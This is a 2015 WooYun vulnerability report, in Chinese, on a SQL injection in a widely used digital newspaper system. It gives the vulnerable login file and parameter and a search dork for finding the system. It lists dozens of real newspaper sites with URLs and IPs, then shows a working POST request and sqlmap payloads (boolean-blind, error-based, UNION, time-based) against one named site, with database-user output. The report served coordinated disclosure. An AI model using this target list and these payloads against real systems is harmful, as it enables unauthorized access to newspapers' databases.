当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0117732

漏洞标题:某数字报刊系统通用SQL注入漏洞,影响大量知名报社

相关厂商:国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-06-02 18:57

修复时间:2015-09-06 00:00

公开时间:2015-09-06 00:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-02: 细节已通知厂商并且等待厂商处理中
2015-06-05: 厂商已经确认,细节仅向厂商公开
2015-06-08: 细节向第三方安全合作伙伴开放
2015-07-30: 细节向核心白帽子及相关领域专家公开
2015-08-09: 细节向普通白帽子公开
2015-08-19: 细节向实习白帽子公开
2015-09-06: 细节向公众公开

简要描述:

某数字报刊系统通用SQL注入漏洞,影响大量知名报社

详细说明:

系统架构:JSP+MYSQL
漏洞文件:/epaper/test/login_check.jsp
注入参数:username
关键字:inurl:/epaper 北京紫新报通科技发展有限公司

11.png


中国医学论坛报:
http://epaper.cmt.com.cn/epaper/uniflows/html/2015/05/29/K-01/default.htm
增城日报:
http://zcrb.zcwin.com/epaper/
孝感日报:
http://szb.xgrb.cn:9999/epaper/xgwb/html/2015/06/02/01/default.htm
定州日报:
http://szb.dingzhoudaily.com:10000/epaper/paper.jsp?papername=%B6%A8%D6%DD
%C8%D5%B1%A8&pubdate=2014-07-24&pagename=01&pubpath=aper/dzrb/html
中国会计报:
http://www.zgkjb.com.cn/epaper/uniflows/html/2015/03/13/boardpicurl.htm
丹阳日报:
http://dyrb.dy001.cn:9999/epaper/dyrb/html/2015/05/23/02/02_54.html
濮阳日报:
http://www.pyxww.cn:8080/epaper/paper.jsp?papername=
%E5%A7%D1%F4%C8%D5%B1%A8&pubdate=2015-03-05&pagename=01&pubpath=pyrb/html
永新周刊:
http://www.yongxin.gov.cn/epaper/uniflows/20150406/01/01_33.htm
中华工商时报:
http://124.42.72.218/epaper/uniflows/html/2015/05/29/06/default.htm
拉萨晚报:
http://www.lasa-eveningnews.com.cn/epaper/uniflows/html/2015/05/29/02/default.htm
今日龙泉:
http://lqszb.zjol.com.cn/epaper/lq/html/2014/11/17/02/default.htm
淮业日报:
http://www.hbnews.net/epaper/hbrb/html/2014/10/17/1/default.htm
丽水广播电视:
http://xyz.lsol.com.cn/epaper/search/index.jsp
柳州日报:
http://www.lznews.gov.cn:9999/epaper/lzrb/html/2015/06/02/01/default.htm
松阳日报:
http://szb.zgsynews.com/epaper/xsy/html/2015/05/05/1/1_42.htm
南宁日报:
http://nnrb.nnnews.net:9999/epaper/nnrb/html/2013/03/26/00/default.htm
同仁日报:
http://58.42.132.75:8080/epaper/trrb/html/
北海晚报:
http://bhrb.beihai.gov.cn:8080/epaper/bhwb/html/2015/06/01/01/default.htm
粮油市场报:
http://www.grainnews.com.cn:9998/epaper/uniflows/html/2015/04/02/boardpicurl.htm
无锡新周刊:
http://58.214.255.28/epaper/wxxzk/html/2014/12/19/B05/B05_29.htm
丹阳日报:
http://epaper.dydaily.com.cn:9999/epaper/dyrb/html/2015/06/02/01/default.htm
孝感日报:
http://szb.xgrb.cn:9999/epaper/
中国医学论坛报:
http://114.113.148.102/epaper/uniflows/html/2015/04/24/K-02/default.htm
保山日报:
http://www.baoshandaily.com:8080/epaper/search/index.jsp
邵阳日报:
http://epaper.shaoyangnews.net/epaper/syrb/html/2010/01/30/04/04_55.htm
娄底日报:
http://ldrb.xxcmw.com:81/epaper/ldrb/html/2014/12/20/01/01_69.htm
生态新区:
http://61.153.66.148/epaper/search/index.jsp
中国经济导报:
http://www.ceh.com.cn/epaper/uniflows/html/2015/06/02/A01/default.htm
庆元日报:
http://122.224.69.77:9999/epaper/uniflows/html/2013/09/09/01/01_130.htm
河南法制报:
http://219.156.123.48:8080/epaper/uniflows/hnfzb/2015/01/21/11/11_53.htm

漏洞证明:

漏洞验证:
以玉溪日报:http://www.yxdaily.com/epaper/test/login.jsp为例:
登陆处

POST /epaper/test/login_check.jsp HTTP/1.1
Host: www.yxdaily.com
Proxy-Connection: keep-alive
Content-Length: 57
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.yxdaily.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.yxdaily.com/epaper/test/login.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=8D1D47C062D01D44C028E9F268452CA7; safedog-flow-item=63883A7D6B673DD6E2B80B2B72F77095
username=aaaaaaaaaa&password=aaaaaaa&Submit=%B5%C7+%C2%BC


Place: POST
Parameter: username
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY claus
e (RLIKE)
    Payload: username=aaaaaaaaaa' RLIKE IF(3910=3910,0x61616161616161616161,0x28
) AND 'bANG'='bANG&password=aaaaaaa&Submit=%B5%C7 %C2%BC
    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)
    Payload: username=aaaaaaaaaa' AND EXTRACTVALUE(8740,CONCAT(0x5c,0x3a6d6b623a
,(SELECT (CASE WHEN (8740=8740) THEN 1 ELSE 0 END)),0x3a7361643a)) AND 'mCBX'='m
CBX&password=aaaaaaa&Submit=%B5%C7 %C2%BC
    Type: UNION query
    Title: MySQL UNION query (NULL) - 22 columns
    Payload: username=aaaaaaaaaa' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x3a6d6b623a,0x6478734a64464f4e7
464,0x3a7361643a),NULL,NULL,NULL,NULL,NULL,NULL,NULL#&password=aaaaaaa&Submit=%B
5%C7 %C2%BC
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: username=aaaaaaaaaa' AND 5469=BENCHMARK(5000000,MD5(0x73694271)) AN
D 'HJAp'='HJAp&password=aaaaaaa&Submit=%B5%C7 %C2%BC
---


11.png


当前用户root

11.png


当前数据库:epaper

11.png


等等

修复方案:

如上!

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2015-06-05 18:10

厂商回复:

最新状态:

暂无